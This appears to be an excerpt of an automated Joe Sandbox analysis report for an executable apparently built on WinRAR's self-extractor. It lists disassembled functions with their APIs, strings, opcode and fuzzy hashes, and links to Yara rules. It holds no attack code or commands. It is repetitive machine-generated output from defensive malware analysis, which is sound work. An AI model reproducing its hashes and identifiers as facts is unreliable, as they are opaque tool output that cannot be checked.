Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20052d42666034676028b01d15d2cffdefdd266dec7e2dd0f98b8d8f07818195
Instruction ID: f8ee10cd5ca86a27c3291906415ad315123c0bd76253b87f5dae8df1ed45f73e
Opcode Fuzzy Hash: 20052d42666034676028b01d15d2cffdefdd266dec7e2dd0f98b8d8f07818195
Instruction Fuzzy Hash: 68F06871B182558BDBA4DF29A44372977D0FB08380F84807AE5CD83B04D67C95618F15

Function 00007FF7E1DE3354 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
Instruction ID: ceed27931c3d48de90adba8f18020a71730c9cac01609e2775f7b2f794cd0125
Opcode Fuzzy Hash: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
Instruction Fuzzy Hash: 16A00161908842E0EB48EB10A862671A260FB54301B904072E00D821B89EBCA5618222

Function 00007FF7E1DBD7D0 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 98COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBD964

Strings

::$INDEX_ROOT, xrefs: 00007FF7E1DBD854
:$I30:$INDEX_ALLOCATION, xrefs: 00007FF7E1DBD849
::$EA_INFORMATION, xrefs: 00007FF7E1DBD828
::$INDEX_ALLOCATION, xrefs: 00007FF7E1DBD83E
::$FILE_NAME, xrefs: 00007FF7E1DBD833
::$BITMAP, xrefs: 00007FF7E1DBD807
:$EFS:$LOGGED_UTILITY_STREAM, xrefs: 00007FF7E1DBD86A
::$DATA, xrefs: 00007FF7E1DBD812
::$EA, xrefs: 00007FF7E1DBD81D
::$REPARSE_POINT, xrefs: 00007FF7E1DBD88B
:$TXF_DATA:$LOGGED_UTILITY_STREAM, xrefs: 00007FF7E1DBD875
::$OBJECT_ID, xrefs: 00007FF7E1DBD880
::$LOGGED_UTILITY_STREAM, xrefs: 00007FF7E1DBD85F
::$ATTRIBUTE_LIST, xrefs: 00007FF7E1DBD7FC

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
API String ID: 3668304517-727060406
Opcode ID: 036f0b4177b3bd4acf8be137eac01bdc749329f6e627dd372102b0288b9b6631
Instruction ID: 6022a3a33942d07afcc4b7364bed10592f3f04eff9ba9ee8de685a68db3940ed
Opcode Fuzzy Hash: 036f0b4177b3bd4acf8be137eac01bdc749329f6e627dd372102b0288b9b6631
Instruction Fuzzy Hash: 7A41E836B05F0599EB00EF64E8423E973A5EB48798F800137DA4D43759EFB8D665C352

Function 00007FF7E1DE2A10 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF7E1DE2A26
GetModuleHandleW.KERNEL32 ref: 00007FF7E1DE2A33
GetModuleHandleW.KERNEL32 ref: 00007FF7E1DE2A48
GetProcAddress.KERNEL32 ref: 00007FF7E1DE2A60
GetProcAddress.KERNEL32 ref: 00007FF7E1DE2A73
CreateEventW.KERNEL32 ref: 00007FF7E1DE2A9F
DeleteCriticalSection.KERNEL32 ref: 00007FF7E1DE2AEB
CloseHandle.KERNEL32 ref: 00007FF7E1DE2AFD

Strings

kernel32.dll, xrefs: 00007FF7E1DE2A41
SleepConditionVariableCS, xrefs: 00007FF7E1DE2A56
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00007FF7E1DE2A2C
WakeAllConditionVariable, xrefs: 00007FF7E1DE2A66

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
Instruction ID: d3b6114b063df791573eab2bc2a3a70f35282c5ac33b0599804cae0f78e39ada
Opcode Fuzzy Hash: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
Instruction Fuzzy Hash: 01213D64F09A0381FF18FB10E857775A3A0BF58782FC44177D84E426A4DEBCA5A58223

Function 00007FF7E1DC6A0C Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 444COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC70A6

Part of subcall function 00007FF7E1DB2004: std::_Xinvalid_argument.LIBCPMT ref: 00007FF7E1DB200F

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC70B2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC70B8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC70C4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC70D6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC70DC

Strings

UNC, xrefs: 00007FF7E1DC6BBF
\\?\, xrefs: 00007FF7E1DC6A57, 00007FF7E1DC6A66
DXGIDebug.dll, xrefs: 00007FF7E1DC6A18

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
String ID: DXGIDebug.dll$UNC$\\?\
API String ID: 4097890229-4048004291
Opcode ID: caeda946b173b290eeb0eea351584ffd7bcd35d17f0c3fb79cdbd079912c01be
Instruction ID: e2281178bdbd73c26fa1e88ff94cd0fce912a587725fb13b4098557082758159
Opcode Fuzzy Hash: caeda946b173b290eeb0eea351584ffd7bcd35d17f0c3fb79cdbd079912c01be
Instruction Fuzzy Hash: 9E12E222B08A4280EF10EB64D4422BDA371EB85B98F904537DB6D47BE9DFBCD549C391

Function 00007FF7E1DDA440 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 257COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7E1DB129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7E1DB1396

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDA72F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDA735
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDA73B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDA741
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDA747
EndDialog.USER32 ref: 00007FF7E1DDA7BA

Strings

Software\WinRAR SFX, xrefs: 00007FF7E1DDA52B, 00007FF7E1DDA53A
GETPASSWORD1, xrefs: 00007FF7E1DDA773

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
String ID: GETPASSWORD1$Software\WinRAR SFX
API String ID: 431506467-1315819833
Opcode ID: 100daac0e34165666268f43f408bc6971489d972bf40231fa28c726ba550acfe
Instruction ID: 0144db8bed89cbb1e49a2e808b5fb05ac42b0717b4a2d8c7c387e47fde2809bc
Opcode Fuzzy Hash: 100daac0e34165666268f43f408bc6971489d972bf40231fa28c726ba550acfe
Instruction Fuzzy Hash: 7DB1D062F08B4285FB00EB64D4463ECA372AF85394F808236DE5D26AD9DFBCE555C352

Function 00007FF7E1DEE650 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E1DEE7CD

Strings

NAN(IND), xrefs: 00007FF7E1DEE6FB
INF, xrefs: 00007FF7E1DEE6C3
NAN(SNAN), xrefs: 00007FF7E1DEE6E5
nan(ind), xrefs: 00007FF7E1DEE706
nan(snan), xrefs: 00007FF7E1DEE6F0
NAN, xrefs: 00007FF7E1DEE6B1
nan, xrefs: 00007FF7E1DEE6B8
inf, xrefs: 00007FF7E1DEE6D6

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
API String ID: 3215553584-2617248754
Opcode ID: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
Instruction ID: 6ed105c9d3cb224326305db8278a1c2c1fccc1c14afda96d4a8fec1759b5ff36
Opcode Fuzzy Hash: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
Instruction Fuzzy Hash: 3941BE72E09B4589EB04DF25E8427ED73A8EB18398F80853AEE4C47B58DE7CD125C355

Function 00007FF7E1DDF390 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

GetWindow.USER32 ref: 00007FF7E1DDF3CF
GetClassNameW.USER32 ref: 00007FF7E1DDF3FC
GetWindowLongPtrW.USER32 ref: 00007FF7E1DDF41D
IsDlgButtonChecked.USER32 ref: 00007FF7E1DDF437
GetObjectW.GDI32 ref: 00007FF7E1DDF452
IsDlgButtonChecked.USER32 ref: 00007FF7E1DDF487
DeleteObject.GDI32 ref: 00007FF7E1DDF490
GetWindow.USER32 ref: 00007FF7E1DDF49E

Strings

STATIC, xrefs: 00007FF7E1DDF402

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: Window$ButtonCheckedObject$ClassDeleteLongName
String ID: STATIC
API String ID: 781704138-1882779555
Opcode ID: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
Instruction ID: 51489b475340be332228550cf13ae27cbe2760b688ba44689a4d4e0b77d964fa
Opcode Fuzzy Hash: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
Instruction Fuzzy Hash: C731E621B0864286FB61FB11E5167FAA391BF88BD5F810132ED4D07B45DEBCE4468761

Function 00007FF7E1DD6E80 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 204memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7E1DD7E9B), ref: 00007FF7E1DD7080
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DD717B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DD7181
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DD7187

Strings

<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00007FF7E1DD6F2C, 00007FF7E1DD6F3B
<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>, xrefs: 00007FF7E1DD6ED5, 00007FF7E1DD6EE4
</html>, xrefs: 00007FF7E1DD6F72, 00007FF7E1DD6F81
<html>, xrefs: 00007FF7E1DD6F13

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$AllocGlobal
String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 2721297748-1533471033
Opcode ID: 31d7dc5894d1c9fa85229d9e77b41a308ef747ae09a8312bf4b27f03762016a6
Instruction ID: 6d81b33f105f386321a00936746b611d4aa9ec861db7f1755cd0d90cd49f891d
Opcode Fuzzy Hash: 31d7dc5894d1c9fa85229d9e77b41a308ef747ae09a8312bf4b27f03762016a6
Instruction Fuzzy Hash: 0C81D662F08A0295FB04EBB5D4423ECA372AF48798F804237DE1D576D9DEB8D506C361

Function 00007FF7E1DDAE90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

LICENSEDLG, xrefs: 00007FF7E1DDAEAE

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: Item$Text
String ID: LICENSEDLG
API String ID: 1601838975-2177901306
Opcode ID: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
Instruction ID: 3c81f2f65bcf1395e8754eb84867623de26ad171c749e8f76a2957f8cdbc3975
Opcode Fuzzy Hash: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
Instruction Fuzzy Hash: 57418F25B0861282FB14EB11E8167B9E3A1BF85F85F854176ED4E03B95CFBCE545C322

Function 00007FF7E1DCB9B4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF7E1DCBA12
GetProcAddress.KERNEL32 ref: 00007FF7E1DCBA2D
GetCurrentProcessId.KERNEL32 ref: 00007FF7E1DCBACA

Part of subcall function 00007FF7E1DCDFD0: GetSystemDirectoryW.KERNEL32 ref: 00007FF7E1DCDDDF

Strings

CryptUnprotectMemory failed, xrefs: 00007FF7E1DCBAC1
Crypt32.dll, xrefs: 00007FF7E1DCB9F0
CryptProtectMemory, xrefs: 00007FF7E1DCBA08
CryptProtectMemory failed, xrefs: 00007FF7E1DCBA80
CryptUnprotectMemory, xrefs: 00007FF7E1DCBA1F

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: AddressProc$CurrentDirectoryProcessSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
API String ID: 2915667086-2207617598
Opcode ID: d2e93635ec338890dfe438c4789fcaf7e26687fbfe6c7ce53d5981307f2d6baa
Instruction ID: 75fc2bcbf18022d189ac23ecd2a1af105c4a4c5336e44795b79b7e1c93f27f82
Opcode Fuzzy Hash: d2e93635ec338890dfe438c4789fcaf7e26687fbfe6c7ce53d5981307f2d6baa
Instruction Fuzzy Hash: EB316D20F09B0280EB14EB15A852776A3A1BF48BD1F954537E98E433A8DFFCE551C362

Function 00007FF7E1DD87D8 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 415COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DD8DB6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DD8DC2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DD8DCE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DD8DDA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DD8DE0

Strings

, xrefs: 00007FF7E1DD8A55
, xrefs: 00007FF7E1DD88BE

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: $
API String ID: 3668304517-227171996
Opcode ID: 7957b1f7c23d8b99e8b957fd2374c8a83d1170bc9397b993806739df2f8497c6
Instruction ID: d60e983703f63ebb2c389b4cccf7cd580ef09ba94fd27c09fe365fb41cae36d4
Opcode Fuzzy Hash: 7957b1f7c23d8b99e8b957fd2374c8a83d1170bc9397b993806739df2f8497c6
Instruction Fuzzy Hash: 7DF1D462F1474684EF05EB68D4463BCA361AB84B98F905232CA5D137D9DFBCE0E0C362

Function 00007FF7E1DE57EC Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 317COMMONLIBRARYCODE

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF7E1DE598A
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7E1DE5CAD
abort.LIBCMT ref: 00007FF7E1DE5CE1

Strings

csm, xrefs: 00007FF7E1DE5933
csm, xrefs: 00007FF7E1DE58D1
csm, xrefs: 00007FF7E1DE59B1

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 2940173790-393685449
Opcode ID: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
Instruction ID: a2ef8ae8344adafdf620cef41feeb5daa7aa45cd7eb292c2e8618dcfcdd5c889
Opcode Fuzzy Hash: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
Instruction Fuzzy Hash: CEE1E776D087828AE714EF34D4823ADB7A0FB45789F948236DA4E87655CF78E481C712

Function 00007FF7E1DC4F38 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 158COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7E1DC4E24: SysAllocString.OLEAUT32 ref: 00007FF7E1DC4E5F

VariantClear.OLEAUT32 ref: 00007FF7E1DC5125

Strings

Windows 10, xrefs: 00007FF7E1DC510A
SELECT * FROM Win32_OperatingSystem, xrefs: 00007FF7E1DC5017
WQL, xrefs: 00007FF7E1DC502A
ROOT\CIMV2, xrefs: 00007FF7E1DC4F7B
Name, xrefs: 00007FF7E1DC50F9

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: AllocClearStringVariant
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 1959693985-3505469590
Opcode ID: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
